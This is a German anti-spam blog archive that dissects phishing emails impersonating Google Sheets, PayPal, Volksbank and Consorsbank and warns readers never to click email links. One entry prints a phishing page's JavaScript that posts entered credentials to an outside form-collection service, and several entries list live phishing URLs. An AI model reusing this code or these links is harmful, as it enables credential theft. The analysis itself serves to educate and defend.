Kategoriearchiv „Phishing“

Spreadsheet shared with you… Invoice

Donnerstag, 9. Oktober 2025

Häh? 🤔️

Von: Google Sheets <cassie@lifangvision.com>

Dies ist einer der wenigen Fälle, in denen sogar eine GMail-Adresse als Absender irgendwie glaubwürdiger gewesen wäre. Natürlich verwendet Google stets Mailadressen aus den eigenen Domains. 😁️

account@tamagothi.de shared a spreadsheet

Diese Mailadresse existiert nicht in der Domain tamagothi.de. Die Mailadressen dort richte ich immer noch selbst ein.
Die Domain tamagothi.de wird nicht von Google verwaltet.
Wenn man mir eine Datei zumailen will, kann man sie einfach an die E-Mail anhängen, so wie das seit ungefähr den Achtziger Jahren [!] möglich ist und in den Neunziger Jahren standardisiert und auch immer gern genutzt wurde, weil das nun einmal die direkteste und einfachste Methode ist. Irgendwelche komplizierten Umwege mit Filehostern und Links in einer Mail sind nur erforderlich, wenn die Datei sehr groß ist. Ab der Größenordnung MiB sollte man besser davon absehen, daraus einen Mailanhang zu machen. Rechnungen, Briefe und sogar wissenschaftliche Fachartikel (mit allem Gedöns an eingebetteten Grafiken und schönem Satz in guter Schriftart) sind kleiner, hochauflösende Fotos meist größer.

tamagothi.de (account@tamagothi.de) added you as an editor. Verify your email to securely make edits to this spreadsheet. You will need to verify your email every 7 days. Learn more

Dubai Invoice 10/9/2025 6:19:41 AM

Open

Der Link führt natürlich auch nicht zu Google, sondern in eine Domain, die über das zurzeit von Spammern meistmissbrauchte kostenlose Angebot von Cloudflare läuft. An die URI ist noch einmal die Mailadresse angehängt, damit die Spammer auch wissen, unter welchen Mailadressen die Spam ankommt, gelesen wird und sogar beklickt wird, denn das sind gute Opfer für jede denkbare kriminelle Machenschaft. Dort gibt es ein lustiges HTML-Dokument…

$ curl -s "https://safer-guests-advisory-flat.trycloudflare.com/?#leck@meinen.arsch" >dubai-invoice
$ file dubai-invoice 
dubai-invoice: HTML document, ASCII text
$ mv dubai-invoice dubai-invoice.html
$ lynx -dump dubai-invoice.html 
   Your session has expired, please sign in to continue.
   ____________________
   Please enter a valid email address.
   ____________________
   Please enter your password.
   (BUTTON) Sign In
$ _

…in welchem man seine Mailadresse (wird in Javascript mit der angegebenen Mailadresse vorbelegt) und sein Passwort eingeben und an Kriminelle senden kann. Natürlich haben die Kriminellen hierfür auch ein kostenloses Angebot eines Unternehmens verwendet, in diesem Fall ist es Formspark:

$ sed -n 134,147p dubai-invoice.html
            $.ajax({
                url:'https://submit-form.com/61dmNNQ8B',
                method: 'POST',
                data: {
                    chat_id: chatId,
                    text: message
                },
                success: function(response) {
                    window.location.href = `https://${domain}`;
                },
                error: function(error) {
                    $('#errorMessage').text('Error in submitting form!').show();
                }
            });
$ _

Ich bin übrigens erstaunt, dass dieser Phisher nicht einmal versucht hat, die Zieldomain im Quelltext in kryptischem Coding zu verbergen. Vermutlich ist der Honk, dessen geistiges Herausgefordertsein auch im Text der Spam durchschimmerte, mit solchen Dingen ein bisschen überfordert. Oder er fühlt sich sehr sicher, weil er in einem Staat lebt, in dem nicht so viel Wert auf Ermittlungen in Sachen Computerkriminalität gelegt wird oder in dem Verwaltung, Justiz und Polizeien durch und durch korrupt sind. Besonders sorglos waren früher stets die Phisher und Betrüger aus Nigeria, Russland und der Ukraine, später kam auch das bettelarme Benin hinzu.

Warum der Phisher dann nicht einfach ein HTML-Formular mit POST-Methode und Angabe der Adresse als action-Parameter im FORM-Tag macht? Vermutlich weiß der spammende Idiot gar nicht mehr, dass man so etwas auch in HTML machen kann, und zwar einfacher, kürzer, barrierefreier und klarer. So, wie etwa hier auf Unser täglich Spam das Kommentarformular, weil ich so viel Funktion wie möglich auch für Leser haben möchte, die Wert auf Computersicherheit und Privatsphäre legen (oder legen müssen) und deshalb einen Skriptblocker benutzen – Javascript verwende ich in einer Website extrem ungern und nur für Funktionen, die hübsch sind, aber nicht unbedingt sein müssen. 🤭️

Oder aber der spammende Idiot hat sich seine Phishingseite bei einem angelernten neuronalen Netzwerk – von Politikern, Journalisten und anderen digitalen Analphabeten durchgehend mit dem Reklamewort „künstliche Intelligenz“ bezeichnet, damit wir auch alle weniger Deutsch und mehr Reklame sprechen und denken – erpromptet. Denn wenn sich ein Spammer Mühe geben wollte, brauchte er ja auch nicht zu spammen, sondern könnte gleich arbeiten gehen. Dabei kommt auch ziemlich oft Code aus Lehrbüchern wieder raus, der vom Autor nur didaktisch-illustrativ gemeint war, den aber in der Praxis kein denkender Mensch so schreiben würde, wenn es auch eine ganze Größenordnung weniger komplex geht. Diese angelernten neuronalen Netzwerke haben zwar das Wissen der Welt beim Training mit dem Nürnberger Trichter verabreicht bekommen, aber sie verstehen davon nichts. Gut, dass ich bald tot bin. Nicht, dass mich noch jemand mit neuerdings wieder modernwerdenden Zwangsarbeitsgesetzen dazu heranzieht, den ganzen durch Vibe Coding entstandenen Müll zu entfehlern, zu erweitern oder zu verbessern! Ich habe ehrlich gesagt ein Vierteljahrhundert später immer noch genug vom Jahr-2000-Bug… und da habe ich viel Code von Menschen gelesen, deren Gedanken und Gedankenlosigkeiten noch halbwegs nachvollziehbar formuliert waren, und nicht das stochastisch generierte Geschwall aus angelernten neuronalen Netzwerken. Den Nach-mir-Kommenden wünsche ich viel Glück, sie werden es brauchen! 🫤️

Use is subject to the Google Privacy Policy.

Ganz sicher nicht. 🤥️

Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA

Mein Exemplar dieser Spam wurde über eine IP-Adresse aus dem großen, weiten Russland versendet und hat auf ihrem gesamten Transportweg niemals die USA gesehen.

You have received this email because account@tamagothi.de shared a spreadsheet with you from Google Sheets. Delete visitor session

Dass das eine Lüge ist, sollte jetzt hoffentlich klar genug geworden sein.

Google Workspace

Google, von mir so viel geschmäht, hat damit mal überhaupt nichts zu tun. An keiner Stelle.

Nicht reinklicken, einfach löschen! 🗑️

Generell niemals in eine E-Mail klicken!

Information zu Ihrer Online-Rückerstattung

Dienstag, 30. September 2025

Was ist denn eine Online-Rückerstattung. Kriege ich da mein „Online“ zurück? 😁️

Von: Paуpal <postmaster@647fdc28cd.nxcli.io>

Das ist ganz sicher nicht PayPal. 🎣️

Paypal PNG Images | Vecteurs Et …

Das ist ganz sicher nicht PayPal. 🎣️🤥️

Rückerstattungsanforderung erfolgreich akzeptiert

„Erfolgreich akzeptiert“ ist ein tolles Wort. Klingt wie das genaue Gegenteil von „erfolglos abgewiesen“. 😅️

Guten Morgen,

Genau mein Name!

Wir möchten Sie darüber informieren, […]

Dann tut es doch!

[…] dass Ihre Online-Rückerstattung zur Bearbeitung bereitsteht. Bitte führen Sie die erforderlichen Schritte aus, um sie zu erhalten.

Um Ihre Rückerstattung zu erhalten, verwenden Sie bitte den folgenden Link:

Online-Rückerstattung

Der Link führt natürlich nicht zu PayPal. 🎣️

$ location-cascade "https://chscompaines.10web.cloud/bobo.php"
     1	https://updt-post-inder.codeanyapp.com/plp/sd/id/
     2	signin.php?enc=62dcf9606e572bbd1d6612ee4fc17cde&p=0&dispatch=91e819e167f8d558d2dee110764d8ceb25967e42
$ _

Dort darf man dann Verbrechern den Vollzugriff auf sein PayPal-Konto gewähren, denn die Anmeldedaten, die man dort in einem „liebevoll“ nachgemachten PayPal-Login angibt, gehen direkt an Trickbetrüger:

Screenshot der Phishing-Seite: Nachgemachtes PayPal-Login

Wenn man in die Adressleiste seines Browsers schaut, sieht man, dass man sich gar nicht auf der Website von PayPal befindet. Dafür haben Webbrowser übrigens diese Adressleiste: Dass man auch weiß, wo man gerade ist. Dafür muss man nur hingucken. Es ist beinahe immer gut, zu wissen, wo man ist.

Zum Glück für uns alle gibt es einen ganz einfachen und sehr zuverlässigen Schutz gegen Phishing, einer der häufigsten Trickbetrugsformen im gegenwärtigen Internet: Niemals in eine E-Mail klicken! Wenn man sich für Websites wie PayPal Lesezeichen im Webbrowser anlegt und diese Websites nur noch über diese Lesezeichen aufruft, dann kann einem kein Betrüger so leicht einen irreführenden Link in einer E-Mail unterschieben. Wenn man eine solche Mail empfangen hat und sich unsicher ist, ob sie nicht vielleicht doch echt sein könnte: Einfach die Website von PayPal über das Lesezeichen im Webbrowser aufrufen und sich dort wie gewohnt anmelden! Wenn man dort keine entsprechende Benachrichtigung sieht, hat man einen dieser gefürchteten Cyberangriffe abgewehrt (und sich viel Ärger erspart). So einfach geht das. Macht das! 🛡️

Wenn Sie dem Link nicht innerhalb von 48 Stunden folgen, erfolgt keine Rückerstattung. So reichen Sie eine weitere Rückerstattungsanfrage ein.

Nicht nachdenken, klicken! Sonst kriegt das Geld Flügel! 💸️

Fristsetzungen von zwei Tagen sind übrigens sittenwidrig.

Für weitere Informationen kontaktieren Sie uns bitte unter support@paуpal.de

Bitte nicht an die Absenderadresse antworten!

Bedankt voor uw vertrouwen.

Ich vermute mal, für den Spammer, der weder das eine noch das andere wirklich kennt, sieht Niederländisch im Schriftbild genau so unverständlich wie Deutsch aus. Het is jammer als je helemaal geen hersenen hebt. 😄️

© Copyright 2025 by PayPal

Keine dumme Spam ist vollständig ohne das proklamierte „geistige Eigentum“ auf einen Stummeltext, der nicht einmal in die Nähe der dafür erforderlichen Schöpfungshöhe kommt. Das liegt daran, dass echte Unternehmen genau die gleiche dumme, intelligenzverachtende, hilflos jurafuchtelnde und einschüchternsollende und juristisch völlig wirkungslose Angewohnheit haben.

Verklag mich für mein Vollzitat, Spammer! 😂️

Entf! 🗑️

Handlungsbedarf: Die ausstehende SEPA-Überweisung umgehend stornieren

Sonntag, 21. September 2025

Nein, das ist keine Mail…

Von: Volksbank <noreply@volksbanking.de>

…der Volksbank. Das ist Phishing. Der Link führt nicht auf die Website der Volksbank. Derartige Spams sind im Moment sehr häufig, und vermutlich nicht nur bei mir.

Logo

Hallo Kunde,

Aua, diese Lachschmerzen! Das ist ja mal wieder ganz genau mein Name. Und vor allem ist es…

Wir haben eine ungewöhnliche Abbuchung von Ihrem Bankkonto festgestellt.

…ganz genau meine Kontonummer. Denn natürlich würde eine echte Bank angeben, welches Konto gemeint ist. Es haben ja doch eine Menge Menschen mehrere Bankkonten, etwa um Einkünfte aus selbstständiger Tätigkeit sauber von ihren privaten Umsätzen zu trennen.

Diese Abbuchung scheint nicht mit Ihren üblichen Transaktionen übereinzustimmen.
Wir empfehlen Ihnen, zu überprüfen, ob sie Ihnen bekannt ist.
▶️ Wenn diese Abbuchung unbekannt ist, stornieren Sie sie bitte über Ihren Kundenbereich im Web.

Zugang zu meinem Kundenbereich

Der Link geht natürlich nicht zur Volksbank, sondern zur Website in einer Domain…

$ surbl emvrback.tftpd.net
emvrback.tftpd.net	LISTED: PH
$ _

…die bereits wegen Trickbetrugs (Phishing) auf allen Blacklists dieser Welt steht. Zum Glück für uns alle gibt es einen ganzen einfachen Trick, wie man niemals mehr auf eine der häufigsten Formen des Trickbetrugs im gegenwärtigen Internet hereinfallen kann: Niemals in eine E-Mail klicken! Stattdessen für die Website der Bank (und für Betrüger vergleichbar interessante Websites wie etwa eBay, Amazon) ein Lesezeichen im Browser anlegen und diese Websites nur noch über das dafür angelegte Lesezeichen aufrufen. Dann kann einem kein Betrüger mehr so einfach einen giftigen Link unterschieben.

Wenn man nach Empfang dieser Spam die Website der Bank über das Lesezeichen im Browser aufruft, sich dort wie gewohnt anmeldet und sieht, dass das in der Spam behauptete Problem gar nicht existiert, dann hat man einen dieser gefürchteten Cyberangriffe abgewehrt, eine Menge Geld gespart und verhindert, dass einem viel beschränkte Lebenszeit durch kriminelle Machenschaften versalzen wird. So einfach geht das. Macht das! 🛡️

(Und nein, das mit den Cyberangriffen war kein Witz. Die meisten Taten, die von digital analphabetischen Journalisten und P‘litikern mit dem offendümmlichen Cyberwort bezeichnet werden, obwohl sie nichts mit Kybernetik zu tun haben, werden über irreführende E-Mail begangen und würden nicht funktionieren, wenn Menschen nicht mehr in E-Mails klickten – oder wenn in Unternehmen und Verwaltungen eine Kultur des digitalen Signierens herrschte, die den Absender einer Mail jenseits vernünftiger Zweifel sicherstellt, denn dann könnte man wieder klicken.)

Wenn wir nicht in kürzester Zeit eine Antwort erhalten, können wir für keine Aktion, die mit Ihrem Konto verbunden ist, verantwortlich gemacht werden.

Solche Aufforderungen, gar nicht erst nachzudenken und ganz schnell zu klicken, weil sonst das Geld futschikato weg ist, sind typisch für Phishing. Gern auch mit absurd kurzen Fristsetzungen. Denn jemand, der auch nur einen kurzen Moment nachdenkt, bemerkt meistens das Folgende:

Ich weiß von dem Problem nur wegen einer Mail.
Diese Mail hat einen „komischen“ Absender.
Ich werde in dieser Mail nicht persönlich angesprochen.
Die Kontonummer des Kontos, um das es geht, wird nicht genannt.
So eine Mail habe ich noch nie von der Bank gekriegt.
Woher hat die Bank eigentlich meine Mailadresse?
Wenn ich mit dem Mauszeiger über dem Link stehe und in die Statuszeile gucke, sehe ich, dass es gar nicht zur Website der Bank geht.

Deshalb wird von den Betrügern immer Druck gemacht. Die leben ja davon, dass Leute auf so einen Trickbetrug reinfallen.

Mit freundlichen Grüßen,
Sicherheitsdienst der Volksbank

Ob der Sicherheitsdienst wohl Schlagstöcke hat? 😁️

SSB Automatic Invoice

Samstag, 20. September 2025

Ja, ich merke es schon: Das ist eine sehr „automatische“ Rechnung. Sie kommt auch völlig grundlos bei mir an.

Logo

Ich habe auch ein Logo.

Dear nachtwaechter,

Immerhin besser als „Guten Tag“, aber trotzdem nicht der richtige Name. Gar nicht auszudenken, wie das klingt, wenn jemand „schnupsimaus69 at irgendwas“ heißt. 😁️

This is a billing notice that your invoice INV–2147483648 generated on nachtwaechter is now overdue.

Oh, toll: Mit Nummer. Muss wichtig sein, sonst hätte es ja keine Nummer. Hier, Spammer, wenn euch die Nummern mal ausgehen sollten, ich habe noch ein paar für euch:

$ dd if=/dev/urandom bs=64 count=1 | od -l | sed 's/^[0-9]*[ -]*//' | tr – ' '
1+0 Datensätze ein
1+0 Datensätze aus
64 Bytes kopiert, 2,8494e-05 s, 2,2 MB/s
9104019511127040432  3556446584735863681
6517096418393505982  8953164502467161676
3433427370092636688  7981156417554269279
8046936970601088068  8050893807030589722
$ _

So können eure Spams immer so richtig irre wichtig aussehen. Da vergisst man sogar die mögliche Anrede als Schnupsimaus 69, wenn man so wichtige Nummern sieht. 😁️

Pay now to avoid service cancellation.

Invoice: INV–2147483648

Due Date: 9/19/2025 6:28:32 AM

Oh, wie geil. Eine sekundengenaue Fristsetzung hatte ich auch noch nie. Darüber übersehe ich sogar, dass das US-amerikanische Datumsformat für gestern – die Mail ist übrigens heute angekommen – hier ein kleines bisschen unüblich ist. Aber wofür bezahle ich da eigentlich, und welche Dienstleistung wird storniert? Ich weiß ja nicht einmal, wer mir hier angeblich schreibt. Moment, ich schaue mal in den HTML-Quelltext, da sollte ja oben noch ein Logo nachgeladen werden, das schafft bestimmt Klarheit:

<img style="padding: 20px; max-width: 64px;" alt=" Logo" src="https://www.google.com/s2/favicons?sz=64&amp;domain=tamagothi.de" width="64" height="64">

Oh krass, das ist das Piktogramm meiner eigenen Homepage! Gut, dass Google immer so vielfältig nutzbar ist und dass Google jeder Missbrauch durch Kriminelle seit mindestens anderthalb Jahrzehnten völlig wumpe ist. Zuverlässigkeit und vielseitige persönliche Nutzbarkeit ist eben das Wichtigste im gegenseitigen Umgang zwischen asozialen Unternehmen wie Google und Trickbetrügern. 😅️

(Ja, werter Mitmensch Jurist, ich habe „asozial“ geschrieben. Es ist meine Bezeichnung für Geschäftsmodelle, die darauf basieren, dass ein börsennotiertes Unternehmen Reibach mit kostenlosen Dienstleistungen macht, aber die anfallenden Aufwände und Kosten durch den Missbrauch dieser Dienstleistungen der gesamten restlichen Menschheit aufbürdet. Google ist selbst Spam. Verantwortungslos und geradezu kriminell geschäftstüchtig. Schon sehr, sehr lange. Google stinkt.)

Wer eine sicher konfigurierte Mailsoftware verwendet, die nicht einfach Bilder aus dem Web nachlädt, kann nicht so leicht mit billigen Tricks in die Irre geführt werden. Wer aber seine technische Bildung aus „Mein Auto spricht zu mir“ Knight Rider bezogen hat, wird von „meine Website mailt mich an“ auch nicht weiter überrascht sein. 😆️

You can log in to your client area to view and pay the invoice at:
https://www.tamagothi.de/viewinvoice.php?id=INV–2147483648

Natürlich ist der Link irreführend. Er geht nicht in die Domain tamagothi.de, das ist nur der Linktext. In Wirklichkeit geht es in eine Subdomain von trycloudflare.com Das kostet den Phisher ja auch nichts. Dort bekommt man die Möglichkeit…

Your session has expired, please sign in to continue

…etwas sehr dummes zu tun und auf einer ansonsten völlig nackten Webseite ohne Impressum sein Passwort einzugeben. Dieses geht direkt an Kriminelle. Mit einem Zugriff auf die E-Mail kann man bei den meisten Menschen schon viel anfangen. Man kann Konten bei Amazon oder eBay übernehmen und für Betrugsgeschäfte unter fremder Identität nutzen, man kann aber auch personalisierte Betrugsnummern machen – nicht vergessen: der gesamte bisherige Mailverkehr steht den Betrügern zur Verfügung, und der gibt tiefe Einblicke – und Freunde, Bekannte, Verwandte anschreiben, eine Notlage vorspielen und um Geld bitten, am besten über Western Union, das geht ja am schnellsten.

Wenn man sich angemeldet hat, gibt es eine plumpe Fehlermeldung. Die Daten sind aber schon bei den Trickbetrügern. Um die Daten zu erhalten, verwenden sie die Dienstleistung von Formspark, wo man sich unter Angabe seiner Mailadresse ebenfalls einen kostenlosen Account einrichten kann.

Thank you for using our services,
Visit our website | Log in to your account | Get support

Copyright © All rights reserved.

Vielen Dank, dass ihr Spammer mir so gern den Arsch sauberleckt! 👍️
Klick mal hier | Klick mal dort | Hauptsache, du klickst, denn alle Links führen auf die gleiche Phishing-Seite

Entf! 🚽️

ATTTENTION! : Retrieve Pending Undelivered Emails To Your Inbox

Freitag, 19. September 2025

Abt.: Gib mir grundlos dein Mailpasswort!

Von: Restoredesk.tamagothi.de <Info@mail.nstc.in>

Ja nee, ist klar! Die Domain tamagothi.de wird also von irgendeiner obskuren Institution mit der Domain nstc.in verwaltet. Das wüsste ich aber! Viele Grüße nach Indien. 🤭️

Postmaster tamagothi.de Recipient: planning

We‘re reaching out to let you know that we were unable to deliver some message(s) to your email address due to security restrictions on your mail server.

It appears that your system settings is currently blocking incoming messages.

Account Information:

Email Address: nac███████ter@tamagothi.de

Status: Held

Allow Message Review Message
© 2025. All Rights Reserved.

Mit proklamiertem geistigen Eigentum der tollen Klitsche „Alle Rechte vorbehalten“. Oder firmiert das Unternehmen vielleicht als 2025? Das wäre doch eine tolle Zahl, die man auf elf verschiedene Weisen als Summe dreier Quadratzahlen schreiben kann und in deren Primfaktorzerlegung nur die Primzahlen 3 und 5 vorkommen. Die Links gehen übrigens in eine Subdomain von trycloudflare.com. Kostet die Phisher ja nix.

Cloudflare hat den kriminellen Müll schon entfernt. Danke! Es wird ein vermutlich ein ganz ordinäres Phishing auf Mailpasswörter gewesen sein. Verbrecher treten ja viel lieber unter anderer Identität auf, wenn sie ihre Verbrechen begehen, denn sie tragen nicht so gern Handschelle.

(Wenn man mir eine Mail nicht angenommen wird, hat das übrigens immer einen Grund. Die meisten dieser Gründe konfiguriere ich von Hand. Wer mich über Mail erreichen möchte, sollte vielleicht nicht spammen.)

Fwd:Bestätigen Sie Ihre Telefonnummer!

Donnerstag, 18. September 2025

Von: Coпsoгsbaпk <philippeorlak1@dm51hjunltopaeg2.com>

Sehr unterzeugend.

An: Coпsoгsbaпk <amas.alex@mail.dellingermgt.com>

Aber das bin ich gar nicht.

Consorsbank Logo

Und so etwas sehe ich nicht. Ich benutze halbwegs sicher und privatsphärenschützend konfigurierte Mailsoftware, die im HTML-formatierten Mails keine Bilder aus dem Web nachlädt. Außerdem will ich mal hoffen, dass die echte Consorsbank…

<img src="https://upload.wikimedia.org/wikipedia/commons/c/c8/Consorsbank_Logo.png" alt="Consorsbank Logo" width="180" style="display: block;">

…in Mails an ihre Kunden nicht das Logo aus der Wikipedia benutzt. 😁️

Bestätigen Sie Ihre Telefonnummer

Warum sollte ich? Ruft mich doch klingeling einfach an, dann wisst ihr auch, ob die Nummer stimmt. ☎️

Guten Tag,

So genau hat schon lange kein Betrüger mehr meinen Namen gekannt.

(Eine echte Bank würde sicherlich neben einer persönlichen und namentlichen Ansprache noch die Kontonummer angeben. Viele Menschen haben mehrere Konten, zum Beispiel, um Geldflüsse aus selbstständiger geschäftlicher Tätigkeit sauber von ihren privaten Geldflüssen zu trennen.)

Im Rahmen unserer kontinuierlichen Bemühungen um die Sicherheit Ihres Kontos, bitten wir Sie, Ihre Telefonnummer innerhalb der nächsten 48 Stunden zu bestätigen.

Bei Nichtbestätigung:

Bestimmte Funktionen Ihres Online-Kontos werden vorübergehend gesperrt

Überweisungen sind nicht mehr möglich

Online-Rechnungszahlung wird deaktiviert

Andere sensible Operationen werden eingeschränkt

Die gesetzte Frist nennt ein Staatsanwalt „sittenwidrig“, die angedrohten Nachteile, wenn man nicht gefügig ist, nennt ein Staatsanwalt „Nötigung“. Diese ist strafbar. Deshalb werden richtige Banken so etwas nicht machen und deutlich vorsichtiger formulieren. Solche Ankündigungen großer, für viele Menschen auch existenzieller Probleme bei Nichtgefügigkeit sind ein ganz klarer Hinweis darauf, dass man es mit der Spam eines Trickbetrügers zu tun hat.

Diese zusätzliche Sicherheitsmaßnahme hilft uns, Ihr Konto vor unbefugtem Zugriff zu schützen.

Telefonnummer bestätigen

Der Link geht nicht etwa zur Consorsbank, sondern in die Cloud von Amazon. Das wäre, wenn es echt wäre, ein Verstoß gegen geltendes Datenschutzrecht. Zum Glück ist es zur Abwechslung diesmal Amazon und nicht – wie sonst recht regelmäßig – Google (nein, ich mag Amazon auch nicht), so dass es nur Sekunden nach meiner Abuse-Meldung gedauert hat, bis eventuelle Opfer mit einem klar formulierten Hinweis gewarnt wurden:

Screenshot der bei Amazon gehosteten Phishing-Site: Warning -- Suspected Phishing -- This website has been reported for potential phishing. -- Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source. -- [Learn more]

Geht doch! Da könnte sich Google mal eine Scheibe von abschneiden. Ach, Google ist das egal? Sage ich doch immer: Kumpel und Komplize, das ist Google.

So, und jetzt noch ein bisschen vom angelernten neuronalen Netzwerk – von Politikern, Journalisten und sonstigen digitalen Analphabeten durchgehend mit dem Reklamewort „künstliche Intelligenz“ bezeichnet – aufgeschäumter und formatierter Blah- und Blähtext aus der Hirnhölle der Spam:

Wenn Sie Schwierigkeiten haben oder keinen Zugang zu Ihrem Online-Konto haben, wenden Sie sich bitte persönlich an eine unserer Filialen mit einem Ausweisdokument, um die Situation zu regeln.

Eingeschränkte Funktionen nach Ablauf der Frist

Überweisungen
Überweisungen und Geldtransfers
Alle Transfervorgänge werden blockiert

Rechnungen
Rechnungszahlungen
Keine neuen Zahlungen möglich

Einstellungen
Änderungen der Sicherheitseinstellungen
Passwort- oder Limitänderungen werden blockiert

Benötigen Sie Hilfe?
Unser Kundenservice ist für Sie da unter 0911 – 36 92 ██ ██ (Montag bis Freitag von 8-18 Uhr).

Nein, ich benötige keine Hilfe, ich habe einen gut funktionierenden Spamfilter und ein Gehirn. Das ist ein unschlagbares Duo, das ich nur empfehlen kann. Aber selbst wenn: Ich würde natürlich auch nicht in die Mail klicken, sondern hätte ein Browserlesezeichen für meine Bank. Ich würde die Website über das Lesezeichen aufrufen und mich dort wie gewohnt anmelden. Wenn ich nach meiner Anmeldung keinen Hinweis auf das Problem sehen würde, das in der Mail behauptet wurde, hätte ich einen dieser gefürchteten Cyberangriffe abgewehrt. So einfach geht das. Macht das! 🛡️

© 2025 Consorsbank. Alle Rechte vorbehalten.

Keine miese Spam ist vollständig, ohne dass das hokus pokus „geistige Eigentum“ auf einen Text proklamiert wird, der so etwas wie die dafür erforderliche „Schöpfungshöhe“ nicht einmal von weitem gesehen hat. Vorlage dafür ist die absurde Jurafuchtelei, die leider auch von richtigen Unternehmen betrieben wird, ohne dass sich jemand daran zu stören scheint.

Impressum | Datenschutz | Newsletter abbestellen

Ach, das ist ein „Newsletter“ und gar kein Hinweis auf ein wichtiges Problem mit dem Konto? Da hat man beim Lesen ja gar nicht bemerkt. 😅️

Diese Nachricht wurde zu Ihrer Sicherheit bezüglich Ihres Consorsbank-Kontos versendet.

Diese Nachricht wurde von einem Spamskript in der Google-Cloud versendet.

Letzte Warnung: Online-Identifizierung vor dem 16. September erforderlich

Montag, 15. September 2025

Huch, heute ist ja der 15. September, und morgen ists zu spät. Wehe dem, der mal nicht an seine Mail kommt. „Sittenwidrig“ nennt man solche Fristen.

Wer schreibt mir denn?

Von: Paypal <postmaster@0678c5a76c.nxcli.io>

Nun, PayPal ist es nicht. Die würden Mailadressen in ihrer eigenen Domain verwenden, und vermutlich auch nicht den postmaster als Absender benutzen.

PayPal Unveils New Logo and ‚Powering the People Economy‘ Campaign

Natürlich ist das der ALT-Text eines Bildes, das aus dem Web nachgeladen werden soll. Menschen mit unsicher konfigurierter Mailsoftware würden hier stattdessen das folgende Bild sehen:

Das Logo wird übrigens von einem Google-Server nachgeladen. Nicht von PayPal. Der ALT-Text, den zu ändern der Trickbetrüger zu faul war, zeigt vermutlich, in welchen Kontext es einmal verwendet wurde. Ach ja, und der überlagerte rote Schriftzug ist von mir. Ich werde nicht so gern zum Bildhoster für Spammer und Betrüger.

Sehr geehrter Kunde, sehr geehrte Kundin,

Kürzlich haben wir Sie gebeten, sich online zu identifizieren. Leider haben wir Ihre Identifizierung bisher nicht erhalten.

Ohne eine abgeschlossene Identifizierung können Sie ab dem 15. September keinen Zugriff mehr auf die Online-Banking-Dienste erhalten. Für die Identifizierung benötigen Sie die Referenznummer dieser E-Mail.

Ihre Referenznummer lautet: 420931.

Bitte beachten Sie, dass dieser Code 24 Stunden gültig ist.

Greifen Sie online zu unter: https://paypal.de/update/id=9003615411
1. Geben Sie die angeforderten Informationen ein.
2. Führen Sie die SMS-Verifizierung durch.
3. Identifizierung abgeschlossen.

Vom Paypal-Team

Bitte antworten Sie nicht auf diese E-Mail. Bei Fragen zu Ihrem Konto kontaktieren Sie uns bitte unter der Nummer 133 464. Dies ist eine automatische Nachricht.

© Paypal 2025

Aber „PayPal“, vor einer Woche warst du noch „SumUp“ und hast zwar eine andere andere Referenznummer, aber genau die gleiche Kontaktnummer im ansonsten völlig gleichen dummen Text benutzt. Ich habe keine Lust, das alles noch einmal hier zu wiederholen.

Aber eins ist neu. Der Spammer hat inzwischen gemerkt, dass er HTML-Mail versendet und dass der Linktext eben nur ein Linktext, aber nicht die Adresse des Links ist. Auch, wenn er so aussieht. Natürlich führt der Link nicht zu PayPal. Eine gute Mailsoftware gibt bei diesem unter Betrügern sehr beliebten Trick eine deutlich formulierte Warnung vor dem möglichen Betrug aus:

Wenn man eine gute Mailsoftware hat, die HTML-Mail nicht in HTML darstellt, sondern für die Anzeige in reinen Text verwandelt, kann man von niemandem auf diese Weise überrumpelt werden. Einmal ganz davon abgesehen, dass man damit auch viel für den Schutz seiner Privatsphäre tut.

Ich empfehle übrigens, solche Meldungen einer Software niemals ungelesen wegzuklicken. Ich finde es erstaunlich, wie häufig ich bei Computerproblemem um Hilfe gebeten werde, aber wenn ich dann frage, was in der Fehlermeldung stand, höre ich: „Die Fehlermeldung habe ich weggeklickt und nicht gelesen“. Das sind genau die Leute, die am Computer gefährlich leben. Vor allem, wenn der Computer dabei am Internet hängt, E-Mail empfangen kann und allen möglichen Formen der Kriminalität ausgesetzt ist. Wenn ich es ihnen sage, lachen sie über mich und halten mich für paranoid. Ich bin es längst leid, ertragen zu müssen, wie sich die Dummheit überall für schlau hält. Egal, ob in meinem Umfeld, im Bundestag, im Journalismus oder in den Geisterwisschenschaften.

(Übrigens kann man in jeder grafischen Oberfläche jedes Betriebssystems Screenshots von so einer Meldung anfertigen und in die Zwischenablage oder in einer Datei ablegen. Mit einem einfachen Tastaturkommando. Bitte lernt das! Auch, wenn die Meldung schlecht formuliert ist – das ist leider auch in den 2020er Jahren noch die Regel – und euch nichts sagt, kann sie jemandem, den ihr um Hilfe bittet, sehr beim Verständnis eures Problems helfen.)

Aber eigentlich sollte man aber gar nicht erst auf den Link in einer Mail klicken. Denn wenn man nicht in E-Mails klickt, ist man vor Phishing – immer noch eine der häufigsten Formen des Trickbetrugs im Internet – sicher. Kein Betrüger kann einem dann noch so einfach einen giftigen Link unterschieben. Stattdessen ein Lesezeichen im Webbrowser anlegen und Websites wie PayPal nur über dieses Lesezeichen aufrufen! Wenn man sich dort wie gewohnt angemeldet hat und keinen Hinweis auf das angebliche Problem angezeigt bekommt, hat man einen dieser gefürchteten „Cyberangriffe“ abgewehrt. So einfach geht das! Macht das! 🛡️

Wenn man reinfällt, läuft der Betrug so:

Nach Klick in die Spam soll man sich auf einer „liebevoll“ nachgemachten PayPal-Seite, die aber nicht in der Domain von PayPal liegt, „anmelden“. Die dort angegebene Mailadresse und das Passwort gehen direkt und schnell an eine Trickbetrügerbande.
Man bekommt wenige Sekunden nach seiner „Anmeldung“ einen Hinweis auf der Betrügerwebsite angezeigt, dass man gleich noch eine SMS bestätigen muss, um den Vorgang abzuschließen.
Die Betrüger melden sich unterdessen an und konfigurieren das Konto ein wenig um. Sie geben eine andere Mailadresse an und tragen eine andere Telefonnummer ein. Das geht ratzfatz, denn sie sind darin geübt. Sie leben schließlich davon, und sie leben gut davon.
Man bekommt eine SMS mit einem Code, mit dem man diese Änderung bestätigen kann.
Man ist so dumm, verpeilt, gestresst oder müde, dass man das auch noch macht. „PayPal“ hat ja auch auf „seiner Website“ gesagt, dass man das tun soll.
